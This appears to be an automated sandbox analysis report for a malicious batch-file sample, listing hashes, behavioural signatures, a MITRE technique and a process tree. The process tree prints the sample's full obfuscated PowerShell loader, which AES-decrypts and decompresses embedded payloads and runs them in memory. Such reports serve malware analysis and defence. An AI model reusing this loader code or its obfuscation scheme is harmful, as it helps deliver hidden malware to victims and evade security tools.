2e71fca87c23efa79ccd1fcf975e6bf1e8ef54e11bcd7da652a8b5be229bb7f9

General

Target

2e71fca87c23efa79ccd1fcf975e6bf1e8ef54e11bcd7da652a8b5be229bb7f9.bat
Size

15.4MB
MD5

9b4261ee168a262ff5e19be07127715e
SHA1

93bdee7c0bfeec64ec60f24dfde1a6307bb7c35c
SHA256

2e71fca87c23efa79ccd1fcf975e6bf1e8ef54e11bcd7da652a8b5be229bb7f9
SHA512

f55949d0a0ec4c5084a9e6492d6ca5a24a6c0a5e97411028cc1b80be393aa5f08e746ca2806d895a2196ff061b03b02d9b0ec3f47ae01d548deca1189ca9b71a
SSDEEP

49152:4x1swXYG1njnuXhYywmYjs5agWhpB7QaXlIQBv2cU5uEx+Te+nATMlj5JRu/W+DQ:4

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
2404	2e71fca87c23efa79ccd1fcf975e6bf1e8ef54e11bcd7da652a8b5be229bb7f9.bat.scr

Loads dropped DLL 1 IoCs

pid	Process
2900	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2404	2e71fca87c23efa79ccd1fcf975e6bf1e8ef54e11bcd7da652a8b5be229bb7f9.bat.scr

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2404	2e71fca87c23efa79ccd1fcf975e6bf1e8ef54e11bcd7da652a8b5be229bb7f9.bat.scr

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1036 wrote to memory of 2900	1036	cmd.exe	29
PID 1036 wrote to memory of 2900	1036	cmd.exe	29
PID 1036 wrote to memory of 2900	1036	cmd.exe	29
PID 2900 wrote to memory of 2404	2900	cmd.exe	31
PID 2900 wrote to memory of 2404	2900	cmd.exe	31
PID 2900 wrote to memory of 2404	2900	cmd.exe	31

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2e71fca87c23efa79ccd1fcf975e6bf1e8ef54e11bcd7da652a8b5be229bb7f9.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\2e71fca87c23efa79ccd1fcf975e6bf1e8ef54e11bcd7da652a8b5be229bb7f9.bat
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2900
- - C:\Users\Admin\AppData\Local\Temp\2e71fca87c23efa79ccd1fcf975e6bf1e8ef54e11bcd7da652a8b5be229bb7f9.bat.scr
    "C:\Users\Admin\AppData\Local\Temp\2e71fca87c23efa79ccd1fcf975e6bf1e8ef54e11bcd7da652a8b5be229bb7f9.bat.scr" -w hidden -c $OSYO='RebEPQadbEPQLinbEPQebEPQsbEPQ'.Replace('bEPQ', '');$VCKu='LobEPQadbEPQ'.Replace('bEPQ', '');$FEXv='CrbEPQeatebEPQDebEPQcrybEPQptobEPQrbEPQ'.Replace('bEPQ', '');$mzOn='TrbEPQansbEPQfobEPQrmFbEPQibEPQnabEPQlBlobEPQckbEPQ'.Replace('bEPQ', '');$xHKm='GebEPQtCubEPQrrbEPQentbEPQPrbEPQocbEPQesbEPQsbEPQ'.Replace('bEPQ', '');$jFGA='MbEPQaibEPQnMbEPQodbEPQubEPQlebEPQ'.Replace('bEPQ', '');$GJMn='EnbEPQtrybEPQPobEPQintbEPQ'.Replace('bEPQ', '');$wWaJ='CbEPQhabEPQnbEPQgeEbEPQxtbEPQebEPQnsiobEPQnbEPQ'.Replace('bEPQ', '');$AKUK='SpbEPQlbEPQitbEPQ'.Replace('bEPQ', '');$cGMD='ElebEPQmebEPQntAbEPQtbEPQ'.Replace('bEPQ', '');$EFaB='FrobEPQmBbEPQase6bEPQ4SbEPQtrbEPQibEPQnbEPQgbEPQ'.Replace('bEPQ', '');$WZwZ='InbEPQvokbEPQebEPQ'.Replace('bEPQ', '');function GVQyg($SVclo){$Svoqp=[System.Security.Cryptography.Aes]::Create();$Svoqp.Mode=[System.Security.Cryptography.CipherMode]::CBC;$Svoqp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$Svoqp.Key=[System.Convert]::$EFaB('lKHiwFI9YRDGCt4eek99PqaVXKdBAgRxwQq2kDHILm8=');$Svoqp.IV=[System.Convert]::$EFaB('lCwlZ7HUyy/ogG4lW6uOYw==');$JhYsB=$Svoqp.$FEXv();$Fjbtp=$JhYsB.$mzOn($SVclo,0,$SVclo.Length);$JhYsB.Dispose();$Svoqp.Dispose();$Fjbtp;}function pJPBj($SVclo){$fIwlN=New-Object System.IO.MemoryStream(,$SVclo);$QAPBW=New-Object System.IO.MemoryStream;$XBWZM=New-Object System.IO.Compression.GZipStream($fIwlN,[IO.Compression.CompressionMode]::Decompress);$XBWZM.CopyTo($QAPBW);$XBWZM.Dispose();$fIwlN.Dispose();$QAPBW.Dispose();$QAPBW.ToArray();}$vtgqM=[System.Linq.Enumerable]::$cGMD([System.IO.File]::$OSYO([System.IO.Path]::$wWaJ([System.Diagnostics.Process]::$xHKm().$jFGA.FileName, $null)), 1);$XVtgm=$vtgqM.Substring(2).$AKUK(':');$CTBcU=pJPBj (GVQyg ([Convert]::$EFaB($XVtgm[0])));$qSifp=pJPBj (GVQyg ([Convert]::$EFaB($XVtgm[1])));[System.Reflection.Assembly]::$VCKu([byte[]]$qSifp).$GJMn.$WZwZ($null,$null);[System.Reflection.Assembly]::$VCKu([byte[]]$CTBcU).$GJMn.$WZwZ($null,$null);
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2404

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\2e71fca87c23efa79ccd1fcf975e6bf1e8ef54e11bcd7da652a8b5be229bb7f9.bat.scr

Filesize
462KB

MD5
852d67a27e454bd389fa7f02a8cbe23f

SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc

SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Download Submit
\Users\Admin\AppData\Local\Temp\2e71fca87c23efa79ccd1fcf975e6bf1e8ef54e11bcd7da652a8b5be229bb7f9.bat.scr

Filesize
462KB

MD5
852d67a27e454bd389fa7f02a8cbe23f

SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc

SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Download Submit
memory/2404-59-0x000000001B1B0000-0x000000001B492000-memory.dmp

Filesize
2.9MB

Download
memory/2404-60-0x000007FEF5F00000-0x000007FEF689D000-memory.dmp

Filesize
9.6MB

Download
memory/2404-61-0x0000000001DF0000-0x0000000001DF8000-memory.dmp

Filesize
32KB

Download
memory/2404-62-0x00000000026A0000-0x0000000002720000-memory.dmp

Filesize
512KB

Download
memory/2404-63-0x00000000026A0000-0x0000000002720000-memory.dmp

Filesize
512KB

Download
memory/2404-64-0x00000000026A0000-0x0000000002720000-memory.dmp

Filesize
512KB

Download
memory/2404-65-0x000007FEF5F00000-0x000007FEF689D000-memory.dmp

Filesize
9.6MB

Download
memory/2404-66-0x00000000026A0000-0x0000000002720000-memory.dmp

Filesize
512KB

Download
memory/2404-67-0x000007FEF5F00000-0x000007FEF689D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing